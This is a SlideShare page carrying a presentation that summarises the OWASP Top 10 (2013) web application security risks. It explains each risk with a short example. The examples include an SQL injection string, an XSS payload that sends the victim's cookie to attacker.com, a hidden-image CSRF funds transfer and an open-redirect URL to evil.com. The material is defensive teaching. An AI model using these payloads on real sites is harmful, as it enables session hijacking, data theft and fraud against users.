SlideShare a Scribd company logo
Top 10 Web App Security Risks
This is about…

What is
OWASP?

Why this
security is
important?

The information in this presentation is taken from https://www.owasp.org/index.php/Top_10_2013.

Top 10
risks
What is OWASP?
The Open Web Application Security Project (OWASP) is an open
community dedicated to enabling organizations to develop, purchase, and
maintain applications that can be trusted. At OWASP you’ll find free and
open …









Application security tools and standards
Complete books on application security testing, secure code development,
and secure code review
Standard security controls and libraries
Local chapters worldwide
Cutting edge research
Extensive conferences worldwide
Mailing lists

All of the OWASP tools, documents, forums, and chapters are free and
open to anyone interested in improving application security.

Learn more at: https://www.owasp.org
Why security is important?
• Nonsecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure.
• The difficulty of achieving application security increases exponentially.

Attackers can potentially use many different paths through your application to do harm to your business or organization.
Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.
Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is
caused may be of no consequence, or it may put you out of business.
To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector,
and security weakness and combine it with an estimate of the technical and business impact to your organization.

For each of these risks, we provide generic information about likelihood and technical impact using the following simple
ratings scheme, which is based on the OWASP Risk Rating Methodology.
Top 10 Application Security Risks
А1 Injection
Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an
interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into
executing unintended commands or accessing data without proper authorization.

If the attacker modifies the ‘id’ parameter value in her browser to send: ' or '1'='1.
For example: http://example.com/app/accountView?id=' or '1'='1
This changes the meaning of both queries to return all the records from the accounts table.
More dangerous attacks could modify data or even invoke stored procedures.
Top 10 Application Security Risks
А2 Broken Authentication and Session Management

Application functions related to authentication and session management are often not
implemented correctly, allowing attackers to compromise passwords, keys, or session
tokens, or to exploit other implementation flaws to assume other users’ identities.

Airline reservations application supports URL rewriting, putting session IDs in the URL:
http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii
An authenticated user of the site wants to let his friends know about the sale. He e-mails the
above link without knowing he is also giving away his session ID. When his friends use the
link they will use his session and credit card.
Top 10 Application Security Risks
А3 Cross-Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper
validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user
sessions, deface web sites, or redirect the user to malicious sites.

The application uses untrusted data in the construction of the following HTML snippet without validation or
escaping:
(String) page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>";
The attacker modifies the ‘CC’ parameter in his browser to:
'><script>document.location=http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.
This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the
user’s current session.
Top 10 Application Security Risks
А4 Insecure Direct Object References
A direct object reference occurs when a developer exposes a reference to an internal
implementation object, such as a file, directory, or database key. Without an access control
check or other protection, attackers can manipulate these references to access
unauthorized data.

The application uses unverified data in a SQL call that is accessing account information:
String query = "SELECT * FROM accts WHERE account = ?";PreparedStatement pstmt
=connection.prepareStatement(query , … );pstmt.setString( 1, request.getParameter("acct"));ResultSet results =
pstmt.executeQuery( );
The attacker simply modifies the ‘acct’ parameter in her browser to send whatever account number she wants. If not
properly verified, the attacker can access any user’s account, instead of only the intended customer’s account.
http://example.com/app/accountInfo?acct=notmyacct
Top 10 Application Security Risks
А5 Security Misconfiguration
Good security requires having a secure configuration defined and deployed for the
application, frameworks, application server, web server, database server, and platform.
Secure settings should be defined, implemented, and maintained, as defaults are often
insecure. Additionally, software should be kept up to date.

The app server admin console is automatically installed and not removed. Default
accounts aren’t changed. Attacker discovers the standard admin pages are on your server,
logs in with default passwords, and takes over.
Top 10 Application Security Risks
А6 Sensitive Data Exposure

Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and
authentication credentials. Attackers may steal or modify such weakly protected data to conduct
credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as
encryption at rest or in transit, as well as special precautions when exchanged with the browser.

An application encrypts credit card numbers in a database using automatic database
encryption. However, this means it also decrypts this data automatically when retrieved,
allowing an SQL injection flaw to retrieve credit card numbers in clear text.
The system should have encrypted the credit card numbers using a public key, and only
allowed back-end applications to decrypt them with the private key
Top 10 Application Security Risks
А7 Missing Function Level Access Control

Most web applications verify function level access rights before making that functionality
visible in the UI. However, applications need to perform the same access control checks on
the server when each function is accessed. If requests are not verified, attackers will be
able to forge requests in order to access functionality without proper authorization.

A page provides an ‘action‘ parameter to specify the function being invoked, and
different actions require different roles. If these roles aren’t enforced, that’s a flaw.
Top 10 Application Security Risks
А8 Cross-Site Request Forgery (CSRF)

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the
victim’s session cookie and any other automatically included authentication information, to a
vulnerable web application. This allows the attacker to force the victim’s browser to generate
requests the vulnerable application thinks are legitimate requests from the victim.

The application allows a user to submit a state changing request that does not include anything secret.
http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s
account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s
control:
<img src="http://example.com/app/transferFunds?
amount=1500&destinationAccount=attackersAcct#“width="0" height="0" />
If the victim visits any of the attacker’s sites while already authenticated to example.com, these forged requests
will automatically include the user’s session info, authorizing the attacker’s request.
Top 10 Application Security Risks
А9 Using Components with Known Vulnerabilities

Components, such as libraries, frameworks, and other software modules, almost always run with full
privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or
server takeover. Applications using components with known vulnerabilities may undermine
application defenses and enable a range of possible attacks and impacts.

• Apache CXF Authentication Bypass – By failing to provide an identity token, attackers could invoke
any web service with full permission. (Apache CXF is a services framework, not to be confused with
the Apache Application Server.)
• Spring Remote Code Execution – Abuse of the Expression Language implementation in Spring
allowed attackers to execute arbitrary code, effectively taking over the server.
Top 10 Application Security Risks
А10 Unvalidated Redirects and Forwards

Web applications frequently redirect and forward users to other pages and websites, and use
untrusted data to determine the destination pages. Without proper validation, attackers can
redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

The application has a page called “redirect.jsp” which takes a single parameter named “url”.

The attacker crafts a malicious URL that redirects users to a malicious site that performs
phishing and installs malware. http://www.example.com/redirect.jsp?url=evil.com
Summary
The following table presents a summary of the 2013 Top 10 Application Security Risks, and
the risk factors assigned to each risk. These factors were determined based on the available
statistics and the experience of the OWASP Top 10 team.

To understand these risks for a particular application or organization, you must consider
your own specific threat agents and business impacts.

More Related Content

PPTX
Securing the Web @RivieraDev2016
PDF
C01461422
PDF
OWASP Evening #10 Serbia
PDF
Injection attacks
PDF
OWASP Evening #10
PPT
PPT
Hack applications
PPTX
A7 Missing Function Level Access Control
Securing the Web @RivieraDev2016
C01461422
OWASP Evening #10 Serbia
Injection attacks
OWASP Evening #10
Hack applications
A7 Missing Function Level Access Control

What's hot (20)

PPTX
Securing the Web@VoxxedDays2017
PDF
Security Awareness
PDF
T04505103106
PDF
Owasp top 10
PPTX
Security workshop - Lets get our hands dirty!!
PPTX
A10 - Unvalidated Redirects and Forwards
PPT
Get Ready for Web Application Security Testing
PDF
Unisys_AppDefender_Symantec_CFD_0_1_final
PDF
Study of Web Application Attacks & Their Countermeasures
PPT
OWASP Top 10 And Insecure Software Root Causes
PDF
Techniques for securing rest
PPT
Web Application Security
PPTX
SQL injection
PDF
Mobile application security – effective methodology, efficient testing! hem...
PPTX
OWASP Top 10 Vulnerabilities 2017- AppTrana
PDF
OWASP API Security TOP 10 - 2019
PDF
Owasp Top 10
PPT
Owasp Top 10
PDF
Web Application Security Tips
PPT
Step by step guide for web application security testing
Securing the Web@VoxxedDays2017
Security Awareness
T04505103106
Owasp top 10
Security workshop - Lets get our hands dirty!!
A10 - Unvalidated Redirects and Forwards
Get Ready for Web Application Security Testing
Unisys_AppDefender_Symantec_CFD_0_1_final
Study of Web Application Attacks & Their Countermeasures
OWASP Top 10 And Insecure Software Root Causes
Techniques for securing rest
Web Application Security
SQL injection
Mobile application security – effective methodology, efficient testing! hem...
OWASP Top 10 Vulnerabilities 2017- AppTrana
OWASP API Security TOP 10 - 2019
Owasp Top 10
Owasp Top 10
Web Application Security Tips
Step by step guide for web application security testing
Ad

Viewers also liked (20)

PPTX
Introduction to Web security
ODP
Top 10 Web Security Vulnerabilities
PDF
Web Security 101
PPTX
Web Security
PPTX
Web Security
PDF
Web Security - Introduction v.1.3
PDF
Remote File Inclusion (RFI) Vulnerabilities 101
PPT
Php & Web Security - PHPXperts 2009
PPT
Top Ten Proactive Web Security Controls v5
KEY
Introduction to web security @ confess 2012
PPT
Security in Web 2.0, Social Web and Cloud
PDF
Web Security
PDF
Cisco Study: State of Web Security
PDF
Web Security
PDF
Evolution Of Web Security
PDF
How to Prevent RFI and LFI Attacks
PDF
Local File Inclusion to Remote Code Execution
PDF
Modern Web Security
PPTX
Web security
PPTX
Web Server Web Site Security
Introduction to Web security
Top 10 Web Security Vulnerabilities
Web Security 101
Web Security
Web Security
Web Security - Introduction v.1.3
Remote File Inclusion (RFI) Vulnerabilities 101
Php & Web Security - PHPXperts 2009
Top Ten Proactive Web Security Controls v5
Introduction to web security @ confess 2012
Security in Web 2.0, Social Web and Cloud
Web Security
Cisco Study: State of Web Security
Web Security
Evolution Of Web Security
How to Prevent RFI and LFI Attacks
Local File Inclusion to Remote Code Execution
Modern Web Security
Web security
Web Server Web Site Security
Ad

Similar to Top 10 Web App Security Risks (20)

PPTX
Owasp web security
PPTX
Web and Mobile Application Security
PPTX
Secure Software Engineering
PDF
Web application security I
PPTX
Security risks awareness
DOCX
gpt.AI.docx
PDF
OWASP Top 10 Overview
PDF
Alert logic anatomy owasp infographic
PDF
DataMindsConnect2018_SECDEVOPS
PPTX
webapplicationattacks-101005070110-phpapp02.pptx
PDF
OWASP Top 10 List Overview for Web Developers
PDF
A talk on OWASP Top 10 by Mukunda Tamly
PPTX
PDF
PPTX
Owasp Top 10 2017
PPTX
BDSE03-1121-API-PresentationTemplate.pptx
PPTX
Security Testing Training With Examples
PDF
Owasp top 10 vulnerabilities 2013
PDF
2013 OWASP Top 10
PDF
Secure coding presentation Oct 3 2020
Owasp web security
Web and Mobile Application Security
Secure Software Engineering
Web application security I
Security risks awareness
gpt.AI.docx
OWASP Top 10 Overview
Alert logic anatomy owasp infographic
DataMindsConnect2018_SECDEVOPS
webapplicationattacks-101005070110-phpapp02.pptx
OWASP Top 10 List Overview for Web Developers
A talk on OWASP Top 10 by Mukunda Tamly
Owasp Top 10 2017
BDSE03-1121-API-PresentationTemplate.pptx
Security Testing Training With Examples
Owasp top 10 vulnerabilities 2013
2013 OWASP Top 10
Secure coding presentation Oct 3 2020

More from Sperasoft (20)

PDF
особенности работы с Locomotion в Unreal Engine 4
PDF
концепт и архитектура геймплея в Creach: The Depleted World
PPTX
Опыт разработки VR игры для UE4
PPTX
Организация работы с UE4 в команде до 20 человек
PPTX
Gameplay Tags
PDF
Data Driven Gameplay in UE4
PPTX
Code and Memory Optimisation Tricks
PPTX
The theory of relational databases
PPTX
Automated layout testing using Galen Framework
PDF
Sperasoft talks: Android Security Threats
PDF
Sperasoft Talks: RxJava Functional Reactive Programming on Android
PDF
Sperasoft‬ talks j point 2015
PDF
Effective Мeetings
PDF
Unreal Engine 4 Introduction
PDF
JIRA Development
PDF
Introduction to Elasticsearch
PDF
MOBILE DEVELOPMENT with HTML, CSS and JS
PDF
Quick Intro Into Kanban
PDF
ECMAScript 6 Review
PDF
Console Development in 15 minutes
особенности работы с Locomotion в Unreal Engine 4
концепт и архитектура геймплея в Creach: The Depleted World
Опыт разработки VR игры для UE4
Организация работы с UE4 в команде до 20 человек
Gameplay Tags
Data Driven Gameplay in UE4
Code and Memory Optimisation Tricks
The theory of relational databases
Automated layout testing using Galen Framework
Sperasoft talks: Android Security Threats
Sperasoft Talks: RxJava Functional Reactive Programming on Android
Sperasoft‬ talks j point 2015
Effective Мeetings
Unreal Engine 4 Introduction
JIRA Development
Introduction to Elasticsearch
MOBILE DEVELOPMENT with HTML, CSS and JS
Quick Intro Into Kanban
ECMAScript 6 Review
Console Development in 15 minutes

Recently uploaded (20)

PDF
Electronic commerce courselecture one. Pdf
PDF
Unlocking AI with Model Context Protocol (MCP)
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
PPTX
Cloud computing and distributed systems.
PDF
Review of recent advances in non-invasive hemoglobin estimation
PDF
Empathic Computing: Creating Shared Understanding
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
cuic standard and advanced reporting.pdf
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
PDF
KodekX | Application Modernization Development
PPTX
MYSQL Presentation for SQL database connectivity
PPTX
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
Electronic commerce courselecture one. Pdf
Unlocking AI with Model Context Protocol (MCP)
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
Cloud computing and distributed systems.
Review of recent advances in non-invasive hemoglobin estimation
Empathic Computing: Creating Shared Understanding
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Encapsulation_ Review paper, used for researhc scholars
cuic standard and advanced reporting.pdf
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
Agricultural_Statistics_at_a_Glance_2022_0.pdf
Per capita expenditure prediction using model stacking based on satellite ima...
Digital-Transformation-Roadmap-for-Companies.pptx
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
Mobile App Security Testing_ A Comprehensive Guide.pdf
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
KodekX | Application Modernization Development
MYSQL Presentation for SQL database connectivity
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
Building Integrated photovoltaic BIPV_UPV.pdf

Top 10 Web App Security Risks

  • 1. Top 10 Web App Security Risks
  • 2. This is about… What is OWASP? Why this security is important? The information in this presentation is taken from https://www.owasp.org/index.php/Top_10_2013. Top 10 risks
  • 3. What is OWASP? The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. At OWASP you’ll find free and open …        Application security tools and standards Complete books on application security testing, secure code development, and secure code review Standard security controls and libraries Local chapters worldwide Cutting edge research Extensive conferences worldwide Mailing lists All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. Learn more at: https://www.owasp.org
  • 4. Why security is important? • Nonsecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure. • The difficulty of achieving application security increases exponentially. Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention. Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it may put you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the OWASP Risk Rating Methodology.
  • 5. Top 10 Application Security Risks А1 Injection Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. If the attacker modifies the ‘id’ parameter value in her browser to send: ' or '1'='1. For example: http://example.com/app/accountView?id=' or '1'='1 This changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures.
  • 6. Top 10 Application Security Risks А2 Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities. Airline reservations application supports URL rewriting, putting session IDs in the URL: http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.
  • 7. Top 10 Application Security Risks А3 Cross-Site Scripting (XSS) XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>"; The attacker modifies the ‘CC’ parameter in his browser to: '><script>document.location=http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'. This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
  • 8. Top 10 Application Security Risks А4 Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data. The application uses unverified data in a SQL call that is accessing account information: String query = "SELECT * FROM accts WHERE account = ?";PreparedStatement pstmt =connection.prepareStatement(query , … );pstmt.setString( 1, request.getParameter("acct"));ResultSet results = pstmt.executeQuery( ); The attacker simply modifies the ‘acct’ parameter in her browser to send whatever account number she wants. If not properly verified, the attacker can access any user’s account, instead of only the intended customer’s account. http://example.com/app/accountInfo?acct=notmyacct
  • 9. Top 10 Application Security Risks А5 Security Misconfiguration Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date. The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.
  • 10. Top 10 Application Security Risks А6 Sensitive Data Exposure Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser. An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key
  • 11. Top 10 Application Security Risks А7 Missing Function Level Access Control Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization. A page provides an ‘action‘ parameter to specify the function being invoked, and different actions require different roles. If these roles aren’t enforced, that’s a flaw.
  • 12. Top 10 Application Security Risks А8 Cross-Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. The application allows a user to submit a state changing request that does not include anything secret. http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243 So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control: <img src="http://example.com/app/transferFunds? amount=1500&destinationAccount=attackersAcct#“width="0" height="0" /> If the victim visits any of the attacker’s sites while already authenticated to example.com, these forged requests will automatically include the user’s session info, authorizing the attacker’s request.
  • 13. Top 10 Application Security Risks А9 Using Components with Known Vulnerabilities Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts. • Apache CXF Authentication Bypass – By failing to provide an identity token, attackers could invoke any web service with full permission. (Apache CXF is a services framework, not to be confused with the Apache Application Server.) • Spring Remote Code Execution – Abuse of the Expression Language implementation in Spring allowed attackers to execute arbitrary code, effectively taking over the server.
  • 14. Top 10 Application Security Risks А10 Unvalidated Redirects and Forwards Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages. The application has a page called “redirect.jsp” which takes a single parameter named “url”. The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware. http://www.example.com/redirect.jsp?url=evil.com
  • 15. Summary The following table presents a summary of the 2013 Top 10 Application Security Risks, and the risk factors assigned to each risk. These factors were determined based on the available statistics and the experience of the OWASP Top 10 team. To understand these risks for a particular application or organization, you must consider your own specific threat agents and business impacts.